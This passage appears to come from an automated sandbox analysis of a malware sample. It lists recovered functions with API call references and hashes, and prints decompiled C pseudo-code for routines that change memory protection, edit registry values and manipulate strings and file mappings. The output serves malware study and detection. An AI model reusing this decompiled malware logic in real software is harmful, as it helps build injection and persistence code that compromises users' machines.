                                                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,045681F3,69B25F44,?,?,00000000), ref: 04575A84
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,045681F3), ref: 04575AE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Time$FileFreeHeapSystem
                                                            • String ID: {l0u
                                                            • API String ID: 892271797-597588357
                                                            • Opcode ID: 1dc6e0810d9fccab0e6a6a9aa8a460a7fa22f5b76ed13d68f515d92d83020783
                                                            • Instruction ID: 95988ea233ae73e31d6ef33786c3ffb9225171c511e6b3441bcd9b3566a4caa5
                                                            • Opcode Fuzzy Hash: 1dc6e0810d9fccab0e6a6a9aa8a460a7fa22f5b76ed13d68f515d92d83020783
                                                            • Instruction Fuzzy Hash: F511FE7590120DFBDB11DBA4E984ADE77BCFB08305F100466A501F2550EB38AA48EB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD14C4, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD14C4(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00DD1FBC(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xdda2d4; // 0x2bed5a8
				_t4 = _t24 + 0xddbd70; // 0x39c9318
				_t5 = _t24 + 0xddbd18; // 0x4f0053
				_t26 = E00DD6A1E( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xdda2d4; // 0x2bed5a8
						_t11 = _t32 + 0xddbd64; // 0x39c930c
						_t48 = _t11;
						_t12 = _t32 + 0xddbd18; // 0x4f0053
						_t52 = E00DD73AF(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0xdda2d4; // 0x2bed5a8
							_t13 = _t35 + 0xddbdae; // 0x30314549
							_t37 = E00DD3D26(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0xdda2b4 - 6;
								if( *0xdda2b4 <= 6) {
									_t42 =  *0xdda2d4; // 0x2bed5a8
									_t15 = _t42 + 0xddbbba; // 0x52384549
									E00DD3D26(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0xdda2d4; // 0x2bed5a8
							_t17 = _t38 + 0xddbda8; // 0x39c9350
							_t18 = _t38 + 0xddbd80; // 0x680043
							_t45 = E00DD2A5C(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0xdda290, 0, _t52);
						}
					}
					HeapFree( *0xdda290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00DD44B9(_t54);
				}
				return _t45;
			}



















                                                            0x00dd14c4
                                                            0x00dd14d4
                                                            0x00dd14d7
                                                            0x00dd14de
                                                            0x00dd14e0
                                                            0x00dd14e0
                                                            0x00dd14e3
                                                            0x00dd14e8
                                                            0x00dd14ef
                                                            0x00dd14fc
                                                            0x00dd1501
                                                            0x00dd1505
                                                            0x00dd1513
                                                            0x00dd1521
                                                            0x00dd1525
                                                            0x00dd15b6
                                                            0x00dd15b6
                                                            0x00dd152b
                                                            0x00dd152b
                                                            0x00dd1530
                                                            0x00dd1530
                                                            0x00dd1537
                                                            0x00dd1543
                                                            0x00dd1545
                                                            0x00dd1547
                                                            0x00dd1549
                                                            0x00dd1550
                                                            0x00dd155b
                                                            0x00dd1562
                                                            0x00dd1564
                                                            0x00dd156b
                                                            0x00dd156d
                                                            0x00dd1574
                                                            0x00dd157f
                                                            0x00dd157f
                                                            0x00dd156b
                                                            0x00dd1584
                                                            0x00dd1589
                                                            0x00dd1590
                                                            0x00dd15ae
                                                            0x00dd15b0
                                                            0x00dd15b0
                                                            0x00dd1547
                                                            0x00dd15c2
                                                            0x00dd15c2
                                                            0x00dd15c4
                                                            0x00dd15c9
                                                            0x00dd15cb
                                                            0x00dd15cb
                                                            0x00dd15d6

                                                            APIs
                                                            • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,039C9318,00000000,?,73BCF710,00000000,73BCF730), ref: 00DD1513
                                                            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,039C9350,?,00000000,30314549,00000014,004F0053,039C930C), ref: 00DD15B0
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00DD6DBE), ref: 00DD15C2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 11e03142826da3e83949dcf846dc4f8c574b618e6b33f00566b8fb7d80a41f2b
                                                            • Instruction ID: f13eb414b9ac3d12c3d00568942cd8d5e52e5ecbd449d17e7e16d3b96ef3683e
                                                            • Opcode Fuzzy Hash: 11e03142826da3e83949dcf846dc4f8c574b618e6b33f00566b8fb7d80a41f2b
                                                            • Instruction Fuzzy Hash: D531CF35901209FFCB21DB94ED84EAA7BB9EB44704F150097B505A7262D772AA04DBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD2FE6, Relevance: 4.6, APIs: 3, Instructions: 82memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 91%
                                                            			E00DD2FE6(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t46 = __edx;
				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0xdda2d4; // 0x2bed5a8
				_t2 = _t22 + 0xddb671; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0xdda2a4 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0xdda2a4 =  *0xdda2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E00DD1D41(_t49, _t48); // executed
					_t33 = E00DD3AFD(_t48, _t49); // executed
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0xdda2a4 < 5) {
							 *0xdda2a4 =  *0xdda2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E00DD454A();
					HeapFree( *0xdda290, 0, _t48);
					goto L9;
				}
				_t50 =  *0xdda390; // 0x39c8d6c
				if(RtlAllocateHeap( *0xdda290, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E00DD323C(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36);
				goto L5;
			}















                                                            0x00dd2fe6
                                                            0x00dd2fe6
                                                            0x00dd2fed
                                                            0x00dd2ff4
                                                            0x00dd2ff8
                                                            0x00dd2ffd
                                                            0x00dd3008
                                                            0x00dd3018
                                                            0x00dd305b
                                                            0x00dd305f
                                                            0x00dd3063
                                                            0x00dd3064
                                                            0x00dd3067
                                                            0x00dd306c
                                                            0x00dd306c
                                                            0x00dd306f
                                                            0x00dd3073
                                                            0x00dd30ad
                                                            0x00dd30ad
                                                            0x00dd30b3
                                                            0x00dd30ba
                                                            0x00dd30ba
                                                            0x00dd3075
                                                            0x00dd3078
                                                            0x00dd307a
                                                            0x00dd3087
                                                            0x00dd3089
                                                            0x00dd3090
                                                            0x00dd30c7
                                                            0x00dd30cc
                                                            0x00dd30ce
                                                            0x00dd30d0
                                                            0x00dd30d0
                                                            0x00000000
                                                            0x00dd30ce
                                                            0x00dd3092
                                                            0x00dd3099
                                                            0x00dd30a7
                                                            0x00000000
                                                            0x00dd30a7
                                                            0x00dd301a
                                                            0x00dd3035
                                                            0x00dd304f
                                                            0x00000000
                                                            0x00dd304f
                                                            0x00dd3048
                                                            0x00000000

                                                            APIs
                                                            • wsprintfA.USER32 ref: 00DD3008
                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00DD302D
                                                              • Part of subcall function 00DD323C: GetTickCount.KERNEL32 ref: 00DD3253
                                                              • Part of subcall function 00DD323C: wsprintfA.USER32 ref: 00DD32A0
                                                              • Part of subcall function 00DD323C: wsprintfA.USER32 ref: 00DD32BD
                                                              • Part of subcall function 00DD323C: wsprintfA.USER32 ref: 00DD32DD
                                                              • Part of subcall function 00DD323C: wsprintfA.USER32 ref: 00DD32FB
                                                              • Part of subcall function 00DD323C: wsprintfA.USER32 ref: 00DD331E
                                                              • Part of subcall function 00DD323C: wsprintfA.USER32 ref: 00DD333F
                                                            • HeapFree.KERNEL32(00000000,00DD6E08,?,?,00DD6E08,?), ref: 00DD30A7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: wsprintf$Heap$AllocateCountFreeTick
                                                            • String ID:
                                                            • API String ID: 2794511967-0
                                                            • Opcode ID: ce59c0e674ac7b29b331bd4ec5d75a17a6a9b9013fc8abadd983e8a5befd5002
                                                            • Instruction ID: e6cd90fc062bb3e7e48a707739f10b2d0fe4ac6792d2c5d5af1aca10bb3d7398
                                                            • Opcode Fuzzy Hash: ce59c0e674ac7b29b331bd4ec5d75a17a6a9b9013fc8abadd983e8a5befd5002
                                                            • Instruction Fuzzy Hash: E3310776501209EBCB11DF69D984AAA7BBCFB08350F108017F906EB351D735EA148BB6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04569A1F, Relevance: 4.6, APIs: 3, Instructions: 81registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04581736: RegCreateKeyA.ADVAPI32(80000001,049BA7F0,?), ref: 0458174B
                                                              • Part of subcall function 04581736: lstrlen.KERNEL32(049BA7F0,00000000,00000000,00000000,?,045768CE,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?,04575AB0), ref: 04581774
                                                            • RegQueryValueExA.KERNELBASE(045681F8,00000000,00000000,?,0458B06C,?,00000001,045681F8,00000001,00000000,73B74D40,?,?,?,00000000,045681F8), ref: 04569A73
                                                            • RegSetValueExA.KERNELBASE(045681F8,00000000,00000000,00000003,0458B06C,00000028,?,?,?,00000000,045681F8), ref: 04569AB2
                                                            • RegCloseKey.ADVAPI32(045681F8,?,?,?,00000000,045681F8), ref: 04569ABE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Value$CloseCreateQuerylstrlen
                                                            • String ID:
                                                            • API String ID: 2552977122-0
                                                            • Opcode ID: 6c694a6916667667a2353e1c3a20071c208116af1e975b846e0afe5cc096ad38
                                                            • Instruction ID: 9f44d772a9553612503b30e11e8986e49b1d95d76f571ad8bd76e1e3c5666654
                                                            • Opcode Fuzzy Hash: 6c694a6916667667a2353e1c3a20071c208116af1e975b846e0afe5cc096ad38
                                                            • Instruction Fuzzy Hash: 25313871900219EFDB21DF95E8849AEBBBCFB44750B00516EF511B3250DB746E48EBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457AB7B, Relevance: 4.6, APIs: 3, Instructions: 73registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0456AB88: lstrlen.KERNEL32(00000000,00000000,00000000,00000027,00000000,?,00000000,?,69B25F44,00000000,00000000,00000000), ref: 0456ABBE
                                                              • Part of subcall function 0456AB88: lstrcpy.KERNEL32(00000000,00000000), ref: 0456ABE2
                                                              • Part of subcall function 0456AB88: lstrcat.KERNEL32(00000000,00000000), ref: 0456ABEA
                                                            • RegOpenKeyExA.KERNELBASE(0457AB63,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,0457AB63,80000001,?,045722F6), ref: 0457ABC2
                                                            • RegOpenKeyExA.ADVAPI32(0457AB63,0457AB63,00000000,00020019,80000001,?,0457AB63,80000001,?,045722F6), ref: 0457ABD8
                                                            • RegCloseKey.ADVAPI32(80000001,80000001,?,045722F6,04572306,?,0457AB63,80000001,?,045722F6), ref: 0457AC21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Open$Closelstrcatlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 4131162436-0
                                                            • Opcode ID: 188433d74529d592c631dc0714c4a5d0f88521f6d09e7ceb55719b4a88c7f2ad
                                                            • Instruction ID: 930acc59df8081893126cd6fce4adce3d738d0766bc24ba25123bfa60f9609cf
                                                            • Opcode Fuzzy Hash: 188433d74529d592c631dc0714c4a5d0f88521f6d09e7ceb55719b4a88c7f2ad
                                                            • Instruction Fuzzy Hash: 9A210E75A00109BFDB01DF95EC81CAEBBBDFB85214B144079F904A3111E735AE59AB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD4730, Relevance: 4.6, APIs: 3, Instructions: 73memorystringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 79%
                                                            			E00DD4730(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0xdda290, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E00DD7801(_t57 - _a4, _a4, _t48);
							_t38 = E00DD7801(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E00DD7801(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}
















                                                            0x00dd4738
                                                            0x00dd473d
                                                            0x00dd473f
                                                            0x00dd4746
                                                            0x00dd4758
                                                            0x00dd4758
                                                            0x00dd475c
                                                            0x00dd475e
                                                            0x00dd4761
                                                            0x00dd4764
                                                            0x00dd476d
                                                            0x00dd4777
                                                            0x00dd477b
                                                            0x00dd4780
                                                            0x00dd4790
                                                            0x00dd4796
                                                            0x00dd479a
                                                            0x00dd47e9
                                                            0x00dd479c
                                                            0x00dd479c
                                                            0x00dd47a5
                                                            0x00dd47b4
                                                            0x00dd47b9
                                                            0x00dd47c6
                                                            0x00dd47cf
                                                            0x00dd47da
                                                            0x00dd47e1
                                                            0x00dd47e5
                                                            0x00dd47e5
                                                            0x00dd479a
                                                            0x00dd47f0
                                                            0x00dd47f7

                                                            APIs
                                                            • lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 00DD4764
                                                            • StrStrA.SHLWAPI(00000000,?), ref: 00DD4771
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 00DD4790
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocateHeaplstrlen
                                                            • String ID:
                                                            • API String ID: 556738718-0
                                                            • Opcode ID: 334584317534b6983858e41fb2a993895f97223da9cff61f697cdb383f7df402
                                                            • Instruction ID: 105988a9e5d39e2691c4f0142e16ad3767797dc5e53b7c124ecd99232b90e223
                                                            • Opcode Fuzzy Hash: 334584317534b6983858e41fb2a993895f97223da9cff61f697cdb383f7df402
                                                            • Instruction Fuzzy Hash: 58213936A00249AFCB129F68D884B9EBBB5EF85314F088156EC04AB315D731E919CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6E4B1D96, Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 87%
                                                            			E6E4B1D96(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6e4b41cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}












                                                            0x6e4b1da0
                                                            0x6e4b1dad
                                                            0x6e4b1db3
                                                            0x6e4b1dbf
                                                            0x6e4b1dcf
                                                            0x6e4b1dd1
                                                            0x6e4b1dd9
                                                            0x6e4b1e6e
                                                            0x6e4b1e75
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b1ddf
                                                            0x6e4b1ddf
                                                            0x6e4b1ddf
                                                            0x6e4b1de3
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b1def
                                                            0x6e4b1df3
                                                            0x6e4b1e17
                                                            0x6e4b1e1b
                                                            0x6e4b1e2f
                                                            0x6e4b1e2f
                                                            0x6e4b1e35
                                                            0x6e4b1e44
                                                            0x6e4b1e48
                                                            0x6e4b1e50
                                                            0x6e4b1e50
                                                            0x6e4b1e58
                                                            0x6e4b1e5b
                                                            0x6e4b1e68
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b1e68
                                                            0x6e4b1e23
                                                            0x6e4b1e27
                                                            0x6e4b1e2d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b1e2d
                                                            0x6e4b1dfb
                                                            0x6e4b1dff
                                                            0x6e4b1e09
                                                            0x6e4b1e01
                                                            0x6e4b1e01
                                                            0x6e4b1e01
                                                            0x00000000
                                                            0x6e4b1dff
                                                            0x00000000

                                                            APIs
                                                            • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6E4B1DCF
                                                            • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E4B1E44
                                                            • GetLastError.KERNEL32 ref: 6E4B1E4A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ProtectVirtual$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1469625949-0
                                                            • Opcode ID: cff6f41ea3f4d3cd878fdc4b49ffbae98c0218687cff261b1dc075e4af899348
                                                            • Instruction ID: 25c6de240e40b7917dd9a4870d758d98597a775ed286819e6bd090a252bcf379
                                                            • Opcode Fuzzy Hash: cff6f41ea3f4d3cd878fdc4b49ffbae98c0218687cff261b1dc075e4af899348
                                                            • Instruction Fuzzy Hash: AA21417190020ADFCB14DFE5C885EAAF7B4FF08345F41445AD106D7249E7B4BA69CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6E4B1CDB, Relevance: 4.6, APIs: 3, Instructions: 60stringthreadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 80%
                                                            			E6E4B1CDB() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x6e4b41c4);
				_push(1);
				_push( *0x6e4b41d0 + 0x6e4b5089);
				 *0x6e4b41c0 = 0xc;
				 *0x6e4b41c8 = 0; // executed
				L6E4B1262(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E6E4B1344( &_v44,  &_v28,  *0x6e4b41cc ^ 0xf7a71548) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x6e4b41b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E6E4B109B(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x6e4b41b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E6E4B212C(_t40, _t30 + 4);
					}
				}
				_t23 = E6E4B1B55(_v44); // executed
				goto L7;
			}













                                                            0x6e4b1ced
                                                            0x6e4b1cee
                                                            0x6e4b1cf3
                                                            0x6e4b1cfb
                                                            0x6e4b1cfc
                                                            0x6e4b1d06
                                                            0x6e4b1d0c
                                                            0x6e4b1d15
                                                            0x6e4b1d1a
                                                            0x6e4b1d38
                                                            0x6e4b1d8d
                                                            0x6e4b1d8e
                                                            0x6e4b1d8f
                                                            0x6e4b1d8f
                                                            0x6e4b1d40
                                                            0x6e4b1d46
                                                            0x6e4b1d54
                                                            0x6e4b1d58
                                                            0x6e4b1d5f
                                                            0x6e4b1d67
                                                            0x6e4b1d6b
                                                            0x6e4b1d6d
                                                            0x6e4b1d7c
                                                            0x6e4b1d6f
                                                            0x6e4b1d75
                                                            0x6e4b1d75
                                                            0x6e4b1d6d
                                                            0x6e4b1d84
                                                            0x00000000

                                                            APIs
                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6E4B41C4,00000000), ref: 6E4B1D0C
                                                            • lstrlenW.KERNEL32(?,?,?), ref: 6E4B1D40
                                                              • Part of subcall function 6E4B109B: GetSystemTimeAsFileTime.KERNEL32(?), ref: 6E4B10A8
                                                              • Part of subcall function 6E4B109B: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E4B10BE
                                                              • Part of subcall function 6E4B109B: _snwprintf.NTDLL ref: 6E4B10E3
                                                              • Part of subcall function 6E4B109B: CreateFileMappingW.KERNELBASE(000000FF,6E4B41C0,00000004,00000000,?,?), ref: 6E4B1108
                                                              • Part of subcall function 6E4B109B: GetLastError.KERNEL32 ref: 6E4B111F
                                                              • Part of subcall function 6E4B109B: CloseHandle.KERNEL32(00000000), ref: 6E4B1154
                                                            • ExitThread.KERNEL32 ref: 6E4B1D8F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
                                                            • String ID:
                                                            • API String ID: 4209869662-0
                                                            • Opcode ID: d1daa7aeb64feb96a8fb16023668893d184f6604b01d1f4d3c3fc3d9ff6689de
                                                            • Instruction ID: f1fdb1f9aa856ccdf32f1903591e4f4dcf414ef2b8e02dca43ca75ff0d750a45
                                                            • Opcode Fuzzy Hash: d1daa7aeb64feb96a8fb16023668893d184f6604b01d1f4d3c3fc3d9ff6689de
                                                            • Instruction Fuzzy Hash: 37119D72914605AFDB01EBB9DC48E8B77ECAF4A784F010A1AF550D7250E730F5098BA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04579E27, Relevance: 4.6, APIs: 3, Instructions: 56registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04581736: RegCreateKeyA.ADVAPI32(80000001,049BA7F0,?), ref: 0458174B
                                                              • Part of subcall function 04581736: lstrlen.KERNEL32(049BA7F0,00000000,00000000,00000000,?,045768CE,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?,04575AB0), ref: 04581774
                                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000000,00000001,?,00000001,00000000), ref: 04579E68
                                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,00000010), ref: 04579E9A
                                                            • RegCloseKey.ADVAPI32(?), ref: 04579EBC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Value$CloseCreateQuerylstrlen
                                                            • String ID:
                                                            • API String ID: 2552977122-0
                                                            • Opcode ID: 700371d882489ed3342f09bf8d3031dec42c54f371a66fddd93dc0963a570309
                                                            • Instruction ID: 97446c38840ba007ea565b89541371e0e4f7481b6cdd2790892ed9d3dbaeaaeb
                                                            • Opcode Fuzzy Hash: 700371d882489ed3342f09bf8d3031dec42c54f371a66fddd93dc0963a570309
                                                            • Instruction Fuzzy Hash: 8811FB75900219EFEF10DFA5EC45BEEBBB8FB44715F101069E901B3150DB74AA49EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD3B34, Relevance: 4.6, APIs: 3, Instructions: 54registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD3B34(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0xdda2d4; // 0x2bed5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0xddba40; // 0x4f0053
				_v16 = 4;
				_t31 = E00DD1440(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0xdda2d4; // 0x2bed5a8
					_t5 = _t19 + 0xddba9c; // 0x6e0049
					_t34 = E00DD1440(__ecx, _t5);
					if(_t34 != 0) {
